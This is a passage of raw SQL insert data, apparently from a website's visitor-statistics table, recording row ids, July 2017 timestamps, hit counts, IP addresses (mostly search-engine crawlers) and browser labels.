6551,1,1,0,0,'51.255.65.34','other'),(134663,1500496730,1,1,0,0,'157.55.39.181','other'),(134664,1500497136,1,1,0,0,'66.249.66.75','chrome'),(134665,1500497189,1,1,0,0,'51.255.65.87','other'),(134666,1500497514,1,0,1,0,'66.249.66.74',''),(134667,1500497522,1,0,1,0,'66.249.66.76',''),(134668,1500497747,1,1,0,0,'51.255.65.20','other'),(134669,1500498056,1,1,0,0,'51.255.65.224','other'),(134670,1500498137,1,1,0,0,'5.255.253.63','other'),(134671,1500498334,1,1,0,0,'51.255.65.90','other'),(134672,1500498386,1,1,0,0,'51.255.65.92','other'),(134673,1500498646,1,1,0,0,'141.8.142.154','other'),(134674,1500498949,1,1,0,0,'87.250.224.7','other'),(134675,1500499228,1,1,0,0,'107.21.1.8','other'),(134676,1500499291,1,1,0,0,'51.255.65.18','other'),(134677,1500499299,1,1,0,0,'91.209.11.236','other'),(134678,1500499986,1,1,0,0,'8.29.198.26','other'),(134679,1500499997,1,1,0,0,'51.255.65.67','other'),(134680,1500500021,1,1,0,0,'138.68.89.191','other'),(134681,1500500051,1,1,0,0,'217.182.132.190','other'),(134682,1500500699,1,0,1,0,'66.249.66.155',''),(134683,1500501428,1,1,0,0,'217.182.132.95','other'),(134684,1500501549,2,2,0,0,'87.250.224.7','other'),(134685,1500501846,1,1,0,0,'91.209.11.236','other'),(134686,1500501874,1,1,0,0,'137.74.207.159','other'),(134687,1500501955,1,1,0,0,'217.182.132.171','other'),(134688,1500501960,1,1,0,0,'5.255.253.63','other'),(134689,1500502148,1,1,0,0,'51.255.65.85','other'),(134690,1500502724,2,2,0,0,'216.244.66.194','other'),(134691,1500503078,2,2,0,0,'95.108.179.15','other'),(134692,1500503109,1,1,0,0,'51.255.65.64','other'),(134693,1500503392,1,1,0,0,'51.255.71.118','other'),(134694,1500503399,1,1,0,0,'95.108.213.34','other'),(134695,1500503474,2,2,0,0,'216.244.66.246','other'),(134696,1500503490,1,1,0,0,'46.161.9.55','firefox'),(134697,1500503499,1,1,0,0,'51.255.65.69','other'),(134698,1500504161,1,1,0,0,'51.255.65.87','other'),(134699,1500504197,2,2,0,0,'91.209.11.236','other'),(134700,1500504328,1,1,0,0,'217.182.132.21','other'),(134701,1500504925,2,2,0,0,'95.108.213.34','other'),(134702,1500505210,1,1,0,0,'141.8.142.154','other'),(134703,1500505343,1,1,0,0,'91.209.11.236','other'),(134704,1500505641,1,1,0,0,'217.182.132.27','other'),(134705,1500505660,1,1,0,0,'51.255.65.59','other'),(134706,1500505818,1,0,1,0,'66.249.66.155',''),(134707,1500506459,1,1,0,0,'40.77.167.33','other'),(134708,1500507423,1,1,0,0,'141.8.142.154','other'),(134709,1500507703,3,3,0,0,'216.244.66.194','other'),(134710,1500507748,1,1,0,0,'5.255.253.63','other'),(134711,1500507911,1,1,0,0,'217.182.132.77','other'),(134712,1500507924,1,0,1,0,'66.249.66.155',''),(134713,1500508068,2,2,0,0,'40.77.167.33','other'),(134714,1500508193,2,2,0,0,'216.244.66.246','other'),(134715,1500508306,1,1,0,0,'51.255.65.48','other'),(134716,1500508373,1,1,0,0,'217.182.132.68','other'),(134717,1500508859,1,1,0,0,'141.8.142.154','other'),(134718,1500509232,1,1,0,0,'51.255.65.7','other'),(134719,1500509476,1,1,0,0,'66.249.66.76','chrome'),(134720,1500510953,7,7,0,0,'46.229.168.80','other'),(134721,1500510954,5,5,0,0,'46.229.168.76','other'),(134722,1500510988,5,5,0,0,'46.229.168.69','other'),(134723,1500510993,5,5,0,0,'46.229.168.70','other'),(134724,1500511024,8,8,0,0,'46.229.168.74','other'),(134725,1500511028,5,5,0,0,'46.229.168.78','other'),(134726,1500511042,4,4,0,0,'46.229.168.72','other'),(134727,1500511079,3,3,0,0,'46.229.168.75','other'),(134728,1500511097,3,3,0,0,'46.229.168.71','other'),(134729,1500511146,6,6,0,0,'46.229.168.77','other'),(134730,1500511187,3,3,0,0,'46.229.168.65','other'),(134731,1500511241,3,3,0,0,'46.229.168.67','other'),(134732,1500511331,3,3,0,0,'46.229.168.79','other'),(134733,1500511334,1,1,0,0,'51.255.71.117','other'),(134734,1500511343,3,3,0,0,'141.8.142.164','other'),(134735,1500511380,1,1,0,0,'8.29.198.26','other'),(134736,1500511403,2,2,0,0,'46.229.168.68','other'),(134737,1500511525,1,1,0,0,'217.182.132.172','other'),(134738,1500511530,1,1,0,0,'46.229.168.73','other'),(134739,1500511542,1,1,0,0,'51.255.65.36','other'),(134740,1500511594,1,0,1,0,'66.249.66.156',''),(134741,1500511620,1,1,0,0,'217.182.132.151','other'),(134742,1500511820,2,2,0,0,'95.108.213.34','other'),(134743,1500511866,9,9,0,0,'46.229.168.66','other'),(134744,1500511925,9,9,0,0,'46.229.168.80','other'),(134745,1500511930,4,4,0,0,'46.229.168.78','other'),(134746,1500512034,2,2,0,0,'46.229.168.75','other'),(134747,1500512053,6,6,0,0,'46.229.168.70','other'),(134748,1500512085,6,6,0,0,'46.229.168.77','other'),(134749,1500512124,2,2,0,0,'46.229.168.72','other'),(134750,1500512142,8,8,0,0,'46.229.168.71','other'),(134751,1500512232,3,3,0,0,'46.229.168.79','other'),(134752,1500512286,3,3,0,0,'46.229.168.76','other'),(134753,1500512322,3,3,0,0,'46.229.168.69','other'),(134754,1500512356,3,3,0,0,'46.229.168.74','other'),(134755,1500512358,2,2,0,0,'46.229.168.65','other'),(134756,1500512430,5,5,0,0,'46.229.168.68','other'),(134757,1500512554,1,1,0,0,'87.250.224.18','other'),(134758,1500512632,1,1,0,0,'5.255.253.63','other'),(134759,1500512692,1,1,0,0,'216.244.66.246','other'),(134760,1500512716,1,1,0,0,'217.182.132.27','other'),(134761,1500512776,1,0,1,0,'66.249.66.155',''),(134762,1500512819,2,2,0,0,'46.229.168.73','other'),(134763,1500512833,2,2,0,0,'46.229.168.66','other'),(134764,1500512852,2,2,0,0,'46.229.168.67','other'),(134765,1500512928,1,1,0,0,'51.255.65.9','other'),(134766,1500512967,1,1,0,0,'51.255.65.83','other'),(134767,1500513055,1,1,0,0,'178.154.200.37','other'),(134768,1500513062,1,1,0,0,'178.154.189.3','other'),(134769,1500513100,1,1,0,0,'217.182.132.65','other'),(134770,1500513511,1,0,1,0,'66.249.66.76',''),(134771,1500513532,1,0,1,0,'66.249.66.75',''),(134772,1500513724,1,1,0,0,'95.108.179.15','other'),(134773,1500513728,1,1,0,0,'95.108.181.13','other'),(134774,1500513931,1,1,0,0,'51.255.71.132','other'),(134775,1500514064,2,2,0,0,'216.244.66.194','other'),(134776,1500514702,1,1,0,0,'217.182.132.24','other'),(134777,1500514866,1,1,0,0,'141.8.142.48','other'),(134778,1500515104,1,1,0,0,'217.182.132.175','other'),(134779,1500515248,1,1,0,0,'51.255.71.129','other'),(134780,1500515267,2,2,0,0,'62.210.203.161','chrome'),(134781,1500515351,1,0,1,0,'66.249.66.157',''),(134782,1500515356,1,1,0,0,'51.255.65.45','other'),(134783,1500515856,1,1,0,0,'51.255.65.39','other'),(134784,1500516239,1,1,0,0,'66.249.66.156','chrome'),(134785,1500516318,1,1,0,0,'51.255.65.48','other'),(134786,1500516616,1,1,0,0,'91.209.11.236','other'),(134787,1500517000,1,1,0,0,'95.108.179.15','other'),(134788,1500517121,1,1,0,0,'46.161.9.55','chrome'),(134789,1500517242,1,1,0,0,'87.250.224.18','other'),(134790,1500517246,1,0,1,0,'66.249.66.76',''),(134791,1500517355,1,1,0,0,'51.255.65.34','other'),(134792,1500517592,1,1,0,0,'5.255.253.63','other'),(134793,1500517710,1,1,0,0,'66.249.66.74','chrome'),(134794,1500518049,2,2,0,0,'216.244.66.246','other'),(134795,1500518255,1,1,0,0,'217.182.132.57','other'),(134796,1500518299,1,1,0,0,'217.182.132.34','other'),(134797,1500518485,1,1,0,0,'217.69.133.6','other'),(134798,1500518488,1,1,0,0,'217.69.133.2','other'),(134799,1500519006,1,1,0,0,'51.255.71.100','other'),(134800,1500519438,1,1,0,0,'217.182.132.54','other'),(134801,1500519732,3,3,0,0,'141.8.142.164','other'),(134802,1500519789,1,1,0,0,'51.255.64.106','other'),(134803,1500519811,1,1,0,0,'5.255.253.63','other'),(134804,1500520636,1,1,0,0,'87.250.224.7','other'),(134805,1500520840,1,0,1,0,'66.249.66.155',''),(134806,1500521044,3,0,3,0,'66.249.66.75',''),(134807,1500521066,1,1,0,0,'141.8.142.154','other'),(134808,1500521493,1,1,0,0,'178.154.200.37','other'),(134809,1500521535,1,1,0,0,'51.255.65.96','other'),(134810,1500521639,2,2,0,0,'62.210.203.161','chrome'),(134811,1500521863,1,1,0,0,'217.182.132.97','other'),(134812,1500522540,1,0,1,0,'66.249.66.74',''),(134813,1500522598,1,1,0,0,'217.182.132.56','other'),(134814,1500522694,1,0,1,0,'66.249.66.155',''),(134815,1500522765,1,1,0,0,'8.29.198.26','other'),(134816,1500522948,1,1,0,0,'216.244.66.194','other'),(134817,1500523089,1,1,0,0,'51.255.71.119','other'),(134818,1500523487,1,1,0,0,'66.249.66.75','chrome'),(134819,1500523543,1,1,0,0,'66.249.66.76','chrome'),(134820,1500523589,1,1,0,0,'217.182.132.32','other'),(134821,1500523701,1,1,0,0,'91.209.11.236','other'),(134822,1500523896,1,1,0,0,'217.182.132.6','other'),(134823,1500523940,1,1,0,0,'95.108.213.34','other'),(134824,1500524039,1,1,0,0,'217.69.133.3','other'),(134825,1500524043,1,1,0,0,'217.69.133.194','other'),(134826,1500524048,1,1,0,0,'95.108.213.8','other'),(134827,1500524297,1,1,0,0,'137.74.207.188','other'),(134828,1500524480,1,1,0,0,'157.55.39.93','other'),(134829,1500525186,1,1,0,0,'91.196.178.65','firefox'),(134830,1500525319,1,1,0,0,'216.244.66.194','other'),(134831,1500525721,1,1,0,0,'51.255.65.74','other'),(134832,1500525977,10,10,0,0,'144.76.38.40','other'),(134833,1500526216,1,1,0,0,'217.182.132.50','other'),(134834,1500526534,1,1,0,0,'95.108.213.7','other'),(134835,1500526538,1,1,0,0,'141.8.132.50','other'),(134836,1500527072,1,1,0,0,'91.196.178.72','firefox'),(134837,1500527207,1,1,0,0,'5.255.253.28','other'),(134838,1500527237,1,1,0,0,'91.209.11.236','other'),(134839,1500527289,1,1,0,0,'93.158.152.60','other'),(134840,1500527686,1,1,0,0,'178.154.189.29','other'),(134841,1500527700,1,1,0,0,'91.196.178.161','chrome'),(134842,1500527917,1,1,0,0,'95.108.181.13','other'),(134843,1500528030,1,1,0,0,'91.196.178.70','chrome'),(134844,1500528314,1,1,0,0,'157.55.39.179','other'),(134845,1500528324,2,2,0,0,'173.208.157.186','other'),(134846,1500528382,3,3,0,0,'216.244.66.246','other'),(134847,1500528395,1,1,0,0,'217.182.132.58','other'),(134848,1500528779,1,1,0,0,'91.209.11.236','other'),(134849,1500529097,1,1,0,0,'51.255.65.50','other'),(134850,1500529702,1,1,0,0,'217.182.132.175','other'),(134851,1500529895,1,0,1,0,'68.180.230.48',''),(134852,1500529958,1,1,0,0,'91.196.178.66','chrome'),(134853,1500530132,1,1,0,0,'51.255.65.90','other'),(134854,1500530250,2,0,2,0,'66.249.66.157',''),(134855,1500530537,1,1,0,0,'217.182.132.183','other'),(134856,1500530889,1,1,0,0,'91.209.11.236','other'),(134857,1500531318,1,1,0,0,'217.182.132.83','other'),(134858,1500531390,1,1,0,0,'51.255.71.126','other'),(134859,1500531525,1,1,0,0,'37.55.193.70','chrome'),(134860,1500531619,1,1,0,0,'87.250.224.4','other'),(134861,1500531774,1,1,0,0,'95.108.213.7','other'),(134862,1500531837,1,1,0,0,'141.8.142.49','other'),(134863,1500531842,1,1,0,0,'95.108.179.15','other'),(134864,1500531975,1,1,0,0,'216.244.66.237','other'),(134865,1500532149,1,1,0,0,'217.182.132.4','other'),(134866,1500532180,1,1,0,0,'5.255.253.83','other'),(134867,1500532184,1,1,0,0,'141.8.132.25','other'),(134868,1500532223,1,1,0,0,'108.59.8.70','other'),(134869,1500532572,1,1,0,0,'217.182.132.51','other'),(134870,1500532707,1,1,0,0,'5.255.253.31','other'),(134871,1500532849,1,1,0,0,'87.250.224.16','other'),(134872,1500532904,1,1,0,0,'91.209.11.236','other'),(134873,1500533242,1,1,0,0,'87.250.224.18','other'),(134874,1500533927,1,1,0,0,'77.120.18.52','chrome'),(134875,1500533982,1,1,0,0,'141.8.142.38','other'),(134876,1500534040,1,0,1,0,'66.249.66.75',''),(134877,1500534144,1,1,0,0,'8.29.198.26','other'),(134878,1500534575,2,2,0,0,'62.210.203.161','chrome'),(134879,1500534592,1,1,0,0,'5.255.253.83','other'),(134880,1500534747,1,1,0,0,'95.108.213.34','other'),(134881,1500534774,1,1,0,0,'91.196.177.26','chrome'),(134882,1500534832,1,1,0,0,'157.55.39.93','other'),(134883,1500535155,1,1,0,0,'5.255.253.58','other'),(134884,1500535159,2,2,0,0,'5.255.253.43','other'),(134885,1500535204,1,1,0,0,'141.8.142.38','other'),(134886,1500535208,1,1,0,0,'141.8.183.1','other'),(134887,1500535803,2,2,0,0,'91.209.11.236','other'),(134888,1500536000,1,1,0,0,'87.250.224.18','other'),(134889,1500536266,2,2,0,0,'216.244.66.194','other'),(134890,1500536397,1,1,0,0,'79.79.147.93','other'),(134891,1500536399,1,1,0,0,'78.109.23.1','other'),(134892,1500536400,1,1,0,0,'139.59.107.152','chrome'),(134893,1500536750,1,1,0,0,'95.108.213.8','other'),(134894,1500536821,3,3,0,0,'216.244.66.246','other'),(134895,1500537204,1,0,1,0,'66.249.66.76',''),(134896,1500537251,1,0,1,0,'66.249.66.75',''),(134897,1500537328,1,1,0,0,'51.255.71.110','other'),(134898,1500537744,1,1,0,0,'217.182.132.97','other'),(134899,1500537889,1,1,0,0,'93.158.152.79','other'),(134900,1500538022,1,1,0,0,'51.255.65.41','other'),(134901,1500538147,1,1,0,0,'141.8.142.49','other'),(134902,1500538627,2,2,0,0,'87.250.224.18','other'),(134903,1500538777,1,1,0,0,'51.255.65.70','other'),(134904,1500538868,1,1,0,0,'51.255.65.79','other'),(134905,1500539141,1,1,0,0,'141.8.132.72','other'),(134906,1500539271,1,1,0,0,'5.255.253.58','other'),(134907,1500539684,1,1,0,0,'91.209.11.236','other'),(134908,1500539862,1,1,0,0,'91.196.178.67','firefox'),(134909,1500539884,3,3,0,0,'216.244.66.246','other'),(134910,1500539889,1,1,0,0,'95.108.179.21','other'),(134911,1500539892,1,1,0,0,'178.154.149.3','other'),(134912,1500540173,1,1,0,0,'5.255.253.58','other'),(134913,1500540216,1,1,0,0,'87.250.224.7','other'),(134914,1500540304,1,1,0,0,'217.182.132.182','other'),(134915,1500540365,1,1,0,0,'157.55.39.93','other'),(134916,1500540653,1,1,0,0,'37.53.160.233','chrome'),(134917,1500540791,1,1,0,0,'51.255.65.34','other'),(134918,1500540820,1,1,0,0,'178.154.200.64','other'),(134919,1500540864,1,1,0,0,'193.93.184.171','chrome'),(134920,1500540884,1,1,0,0,'141.8.142.49','other'),(134921,1500540938,1,1,0,0,'217.182.132.184','other'),(134922,1500541077,1,1,0,0,'180.76.15.143','other'),(134923,1500541133,1,1,0,0,'87.250.224.7','other'),(134924,1500541402,1,1,0,0,'217.182.132.16','other'),(134925,1500541481,1,1,0,0,'178.255.215.94','other'),(134926,1500541504,1,1,0,0,'178.154.189.21','other'),(134927,1500541637,1,1,0,0,'87.250.224.24','other'),(134928,1500541847,1,1,0,0,'141.8.142.164','other'),(134929,1500542132,1,0,1,0,'66.249.66.155',''),(134930,1500542196,1,1,0,0,'51.255.65.11','other'),(134931,1500542297,1,1,0,0,'217.69.133.9','other'),(134932,1500542676,1,1,0,0,'51.255.65.8','other'),(134933,1500542691,1,1,0,0,'141.8.142.154','other'),(134934,1500542914,1,1,0,0,'217.182.132.37','other'),(134935,1500542921,1,1,0,0,'66.102.9.27','chrome'),(134936,1500543059,1,1,0,0,'87.250.224.4','other'),(134937,1500543253,1,1,0,0,'217.182.132.181','other'),(134938,1500543420,1,1,0,0,'137.74.207.119','other'),(134939,1500543545,1,0,1,0,'66.249.66.76',''),(134940,1500543841,1,1,0,0,'91.196.178.161','chrome'),(134941,1500543890,1,1,0,0,'91.196.178.71','firefox'),(134942,1500543903,1,1,0,0,'216.244.66.246','other'),(134943,1500544048,1,0,1,0,'66.249.66.79',''),(134944,1500544873,2,2,0,0,'91.209.11.236','other'),(134945,1500544918,1,1,0,0,'46.164.144.86','firefox'),(134946,1500545077,1,1,0,0,'180.76.15.135','other'),(134947,1500545149,1,1,0,0,'164.132.162.187','other'),(134948,1500545194,1,1,0,0,'178.154.189.21','other'),(134949,1500545542,1,1,0,0,'8.29.198.26','other'),(134950,1500545961,5,5,0,0,'216.244.66.194','other'),(134951,1500546258,1,1,0,0,'51.255.71.118','other'),(134952,1500546443,1,1,0,0,'217.182.132.19','other'),(134953,1500546559,1,1,0,0,'95.108.213.7','other'),(134954,1500546910,1,1,0,0,'51.255.65.48','other'),(134955,1500547316,1,1,0,0,'178.154.200.37','other'),(134956,1500547694,1,1,0,0,'217.182.132.90','other'),(134957,1500547824,1,1,0,0,'95.108.213.7','other'),(134958,1500548069,1,1,0,0,'141.8.142.154','other'),(134959,1500548182,1,1,0,0,'164.132.162.154','other'),(134960,1500548356,1,1,0,0,'164.132.164.180','other'),(134961,1500548376,1,1,0,0,'5.255.253.43','other'),(134962,1500548379,1,1,0,0,'87.250.224.24','other'),(134963,1500548467,1,1,0,0,'164.132.162.153','other'),(134964,1500548937,1,1,0,0,'95.108.181.13','other'),(134965,1500548938,1,1,0,0,'141.8.132.25','other'),(134966,1500549146,1,1,0,0,'141.8.142.38','other'),(134967,1500549155,1,1,0,0,'91.196.178.130','firefox'),(134968,1500549220,1,1,0,0,'51.255.65.5','other'),(134969,1500549317,1,1,0,0,'51.255.65.80','other'),(134970,1500549381,1,1,0,0,'95.108.213.7','other'),(134971,1500550041,1,1,0,0,'95.108.179.8','other'),(134972,1500550678,1,1,0,0,'217.182.132.191','other'),(134973,1500550718,1,1,0,0,'180.76.15.31','other'),(134974,1500551084,1,0,1,0,'66.249.66.27',''),(134975,1500551098,1,0,1,0,'66.249.66.26',''),(134976,1500551285,1,1,0,0,'137.74.207.164','other'),(134977,1500551468,1,1,0,0,'91.196.177.46','chrome'),(134978,1500551499,1,1,0,0,'51.255.65.6','other'),(134979,1500551624,1,1,0,0,'216.244.66.246','other'),(134980,1500551660,1,1,0,0,'141.8.142.154','other'),(134981,1500552070,1,1,0,0,'130.180.211.11','chrome'),(134982,1500552089,1,1,0,0,'217.182.132.21','other'),(134983,1500552225,1,1,0,0,'5.255.253.63','other'),(134984,1500552268,1,1,0,0,'217.182.132.69','other'),(134985,1500552510,1,1,0,0,'5.255.253.43','other'),(134986,1500553289,1,1,0,0,'178.154.200.60','other'),(134987,1500553354,1,1,0,0,'217.69.133.5','other'),(134988,1500554004,2,2,0,0,'91.209.11.236','other'),(134989,1500554057,1,1,0,0,'157.55.39.181','other'),(134990,1500554107,1,1,0,0,'217.182.132.193','other'),(134991,1500554460,1,1,0,0,'31.41.88.137','chrome'),(134992,1500554894,1,1,0,0,'217.182.132.148','other'),(134993,1500554995,1,1,0,0,'137.74.207.110','other'),(134994,1500555617,2,2,0,0,'216.244.66.194','other'),(134995,1500555696,1,1,0,0,'46.201.175.91','firefox'),(134996,1500555716,4,4,0,0,'216.244.66.246','other'),(134997,1500555742,1,1,0,0,'51.255.65.35','other'),(134998,1500556011,1,1,0,0,'91.196.178.162','chrome'),(134999,1500556054,2,2,0,0,'95.108.213.34','other'),(135000,1500556110,1,1,0,0,'157.55.39.181','other'),(135001,1500556341,1,1,0,0,'87.250.224.24','other'),(135002,1500556387,1,1,0,0,'37.54.160.142','chrome'),(135003,1500556390,1,1,0,0,'91.196.178.67','chrome'),(135004,1500556475,1,1,0,0,'141.8.142.154','other'),(135005,1500556562,1,1,0,0,'51.255.65.29','other'),(135006,1500556769,1,1,0,0,'46.161.9.55','chrome'),(135007,1500556946,1,1,0,0,'8.29.198.25','other'),(135008,1500557035,1,1,0,0,'217.182.132.4','other'),(135009,1500557048,1,1,0,0,'176.192.248.134','msie'),(135010,1500557096,1,1,0,0,'91.196.178.169','chrome'),(135011,1500557176,1,1,0,0,'51.255.65.2','other'),(135012,1500557505,1,1,0,0,'91.196.178.72','firefox'),(135013,1500557619,1,1,0,0,'141.8.142.164','other'),(135014,1500557783,1,1,0,0,'51.255.65.33','other'),(135015,1500558226,1,1,0,0,'51.255.65.82','other'),(135016,1500558691,1,0,1,0,'66.249.66.25',''),(135017,1500558740,1,0,1,0,'66.249.66.26',''),(135018,1500558876,1,1,0,0,'217.69.133.2','other'),(135019,1500558877,1,1,0,0,'217.69.133.3','other'),(135020,1500558895,1,1,0,0,'51.255.65.16','other'),(135021,1500559081,1,1,0,0,'91.196.178.66','firefox'),(135022,1500559545,1,1,0,0,'91.209.11.236','other'),(135023,1500559775,1,1,0,0,'141.8.142.164','other'),(135024,1500560061,1,1,0,0,'180.76.15.25','other'),(135025,1500560394,1,1,0,0,'46.188.90.133','chrome'),(135026,1500560396,1,1,0,0,'95.221.208.174','chrome'),(135027,1500560427,1,1,0,0,'51.255.65.54','other'),(135028,1500561752,1,1,0,0,'91.209.11.236','other'),(135029,1500561780,1,1,0,0,'217.182.132.59','other'),(135030,1500561988,1,1,0,0,'51.255.71.129','other'),(135031,1500561993,1,1,0,0,'157.55.39.181','other'),(135032,1500562246,1,1,0,0,'51.255.65.6','other'),(135033,1500562313,1,1,0,0,'87.250.224.18','other'),(135034,1500562749,1,1,0,0,'31.128.230.109','chrome'),(135035,1500562783,1,1,0,0,'217.69.133.9','other'),(135036,1500563080,1,1,0,0,'37.52.207.46','chrome'),(135037,1500563183,1,1,0,0,'5.255.253.63','other'),(135038,1500563213,1,0,1,0,'68.180.230.48',''),(135039,1500563288,1,1,0,0,'91.209.11.236','other'),(135040,1500564286,1,1,0,0,'51.255.65.55','other'),(135041,1500564323,1,1,0,0,'51.255.65.50','other'),(135042,1500564523,1,0,1,0,'66.249.66.20',''),(135043,1500564727,1,1,0,0,'51.255.65.84','other'),(135044,1500564790,1,1,0,0,'195.154.251.162','chrome'),(135045,1500564802,2,2,0,0,'91.209.11.236','other'),(135046,1500564855,2,0,2,0,'66.249.66.18',''),(135047,1500564956,1,1,0,0,'95.108.213.34','other'),(135048,1500565176,1,1,0,0,'141.8.142.164','other'),(135049,1500565527,1,1,0,0,'51.255.65.96','other'),(135050,1500566019,1,1,0,0,'51.255.65.77','other'),(135051,1500566029,1,1,0,0,'51.255.71.128','other'),(135052,1500566069,1,1,0,0,'217.182.132.65','other'),(135053,1500566131,1,1,0,0,'141.8.142.38','other'),(135054,1500566135,1,1,0,0,'5.255.253.63','other'),(135055,1500566219,1,1,0,0,'141.8.142.49','other'),(135056,1500566296,1,1,0,0,'217.182.132.71','other'),(135057,1500566523,1,1,0,0,'91.209.11.236','other'),(135058,1500566599,1,1,0,0,'78.137.6.211','chrome'),(135059,1500566694,1,1,0,0,'87.250.224.8','other'),(135060,1500567016,1,1,0,0,'95.132.87.19','firefox'),(135061,1500567153,1,1,0,0,'95.108.213.34','other'),(135062,1500567408,1,1,0,0,'178.255.215.94','other'),(135063,1500567853,1,1,0,0,'51.255.65.38','other'),(135064,1500568349,1,1,0,0,'8.29.198.27','other'),(135065,1500568467,1,1,0,0,'217.182.132.157','other'),(135066,1500568997,1,1,0,0,'217.182.132.154','other'),(135067,1500569770,1,1,0,0,'51.255.65.47','other'),(135068,1500569982,1,1,0,0,'217.69.133.5','other'),(135069,1500569983,1,1,0,0,'217.69.133.194','other'),(135070,1500570326,1,1,0,0,'51.255.65.6','other'),(135071,1500570340,1,1,0,0,'51.255.71.121','other'),(135072,1500571064,1,1,0,0,'157.55.39.181','other'),(135073,1500571138,1,0,1,0,'66.249.66.74',''),(135074,1500571223,1,1,0,0,'91.209.11.236','other'),(135075,1500571635,1,1,0,0,'217.182.132.172','other'),(135076,1500571888,1,1,0,0,'51.255.65.63','other'),(135077,1500572027,1,1,0,0,'217.182.132.14','other'),(135078,1500572633,4,4,0,0,'216.244.66.246','other'),(135079,1500572844,1,1,0,0,'217.182.132.73','other'),(135080,1500572971,1,1,0,0,'51.255.65.46','other'),(135081,1500573365,1,1,0,0,'137.74.207.170','other'),(135082,1500573542,1,1,0,0,'217.182.132.71','other'),(135083,1500574077,1,1,0,0,'5.45.207.64','other'),(135084,1500574186,1,1,0,0,'5.45.207.32','other'),(135085,1500574391,1,0,1,0,'66.249.66.157',''),(135086,1500574531,2,2,0,0,'91.209.11.236','other'),(135087,1500574557,1,0,1,0,'66.249.66.155',''),(135088,1500574863,1,0,1,0,'66.249.66.75',''),(135089,1500575575,1,1,0,0,'91.209.11.236','other'),(135090,1500575589,2,2,0,0,'5.45.207.64','other'),(135091,1500575772,2,2,0,0,'54.165.59.7','other'),(135092,1500576129,1,1,0,0,'51.255.71.112','other'),(135093,1500576543,1,1,0,0,'51.255.65.89','other'),(135094,1500576754,1,1,0,0,'54.165.59.7','other'),(135095,1500576988,1,1,0,0,'217.182.132.33','other'),(135096,1500577088,1,1,0,0,'51.255.71.130','other'),(135097,1500577416,1,1,0,0,'46.161.9.39','chrome'),(135098,1500577439,3,3,0,0,'5.45.207.64','other'),(135099,1500577619,2,2,0,0,'91.209.11.236','other'),(135100,1500577995,3,3,0,0,'216.244.66.194','other'),(135101,1500578193,1,1,0,0,'5.45.207.32','other'),(135102,1500578194,2,2,0,0,'216.244.66.246','other'),(135103,1500578544,1,0,1,0,'66.249.66.76',''),(135104,1500578697,1,1,0,0,'217.182.132.5','other'),(135105,1500578911,3,3,0,0,'5.45.207.64','other'),(135106,1500579248,1,1,0,0,'213.180.203.14','other'),(135107,1500579251,1,1,0,0,'95.108.181.58','other'),(135108,1500579350,1,1,0,0,'66.249.66.155','chrome'),(135109,1500579354,1,1,0,0,'5.45.207.32','other'),(135110,1500579748,1,1,0,0,'8.29.198.26','other'),(135111,1500579984,1,1,0,0,'217.69.133.2','other'),(135112,1500580403,1,1,0,0,'195.154.251.162','chrome'),(135113,1500580745,1,1,0,0,'40.77.167.123','other'),(135114,1500580841,1,1,0,0,'157.55.39.93','other'),(135115,1500580968,3,3,0,0,'216.244.66.194','other'),(135116,1500581014,1,1,0,0,'217.69.133.203','other'),(135117,1500581119,1,1,0,0,'91.209.11.236','other'),(135118,1500581128,1,1,0,0,'95.134.171.132','chrome'),(135119,1500581901,1,1,0,0,'51.255.65.94','other'),(135120,1500581919,1,1,0,0,'37.73.222.3','chrome'),(135121,1500582339,1,1,0,0,'51.255.65.80','other'),(135122,1500582788,1,1,0,0,'37.55.150.69','chrome'),(135123,1500582934,4,4,0,0,'216.244.66.246','other'),(135124,1500582989,1,1,0,0,'217.182.132.151','other'),(135125,1500583060,1,1,0,0,'217.182.132.192','other'),(135126,1500583244,2,2,0,0,'91.209.11.236','other'),(135127,1500583886,1,1,0,0,'217.182.132.54','other'),(135128,1500583895,1,1,0,0,'217.182.132.72','other'),(135129,1500585186,1,1,0,0,'51.255.65.79','other'),(135130,1500585237,1,0,1,0,'66.249.66.157',''),(135131,1500585384,1,1,0,0,'37.190.163.241','chrome'),(135132,1500585411,1,1,0,0,'137.74.207.119','other'),(135133,1500585458,1,1,0,0,'91.209.11.236','other'),(135134,1500585553,1,1,0,0,'217.182.132.16','other'),(135135,1500585796,1,1,0,0,'137.74.207.164','other'),(135136,1500585960,1,1,0,0,'213.180.203.32','other'),(135137,1500586402,1,1,0,0,'217.182.132.78','other'),(135138,1500586523,1,0,1,0,'66.249.66.157',''),(135139,1500586996,1,1,0,0,'216.244.66.194','other'),(135140,1500587518,1,0,1,0,'66.249.66.75',''),(135141,1500587810,1,1,0,0,'51.255.65.36','other'),(135142,1500588101,1,0,1,0,'66.249.66.155',''),(135143,1500588513,2,2,0,0,'216.244.66.246','other'),(135144,1500588946,1,1,0,0,'51.255.65.86','other'),(135145,1500588999,1,1,0,0,'217.182.132.148','other'),(135146,1500590187,1,1,0,0,'217.182.132.72','other'),(135147,1500590197,1,1,0,0,'40.77.167.123','other'),(135148,1500590263,2,2,0,0,'91.209.11.236','other'),(135149,1500590480,1,1,0,0,'51.255.65.49','other'),(135150,1500591026,1,1,0,0,'176.31.231.10','other'),(135151,1500591132,1,1,0,0,'8.29.198.25','other'),(135152,1500591253,1,1,0,0,'51.255.65.44','other'),(135153,1500592139,6,6,0,0,'216.244.66.194','other'),(135154,1500592236,1,1,0,0,'95.218.220.126','firefox'),(135155,1500592254,1,1,0,0,'91.209.11.236','other'),(135156,1500592296,1,1,0,0,'217.182.132.180','other'),(135157,1500592313,1,1,0,0,'141.8.142.154','other'),(135158,1500592782,1,1,0,0,'217.182.132.188','other'),(135159,1500593752,1,1,0,0,'217.182.132.51','other'),(135160,1500594091,2,2,0,0,'91.209.11.236','other'),(135161,1500594530,1,1,0,0,'51.255.71.110','other'),(135162,1500594571,4,4,0,0,'216.244.66.246','other'),(135163,1500594932,1,1,0,0,'87.250.224.24','other'),(135164,1500594967,1,1,0,0,'178.154.189.3','other'),(135165,1500595167,1,1,0,0,'5.255.253.63','other'),(135166,1500595343,1,1,0,0,'51.255.64.106','other'),(135167,1500595641,1,0,1,0,'68.180.231.23',''),(135168,1500596039,2,2,0,0,'216.244.66.246','other'),(135169,1500596042,1,1,0,0,'91.209.11.236','other'),(135170,1500597427,2,2,0,0,'91.209.11.236','other'),(135171,1500597496,1,1,0,0,'141.8.142.154','other'),(135172,1500597622,1,1,0,0,'217.69.133.4','other'),(135173,1500598429,1,1,0,0,'216.244.66.194','other'),(135174,1500598465,1,1,0,0,'95.108.179.15','other'),(135175,1500599104,1,0,1,0,'66.249.76.89',''),(135176,1500599112,1,1,0,0,'95.108.179.8','other'),(1351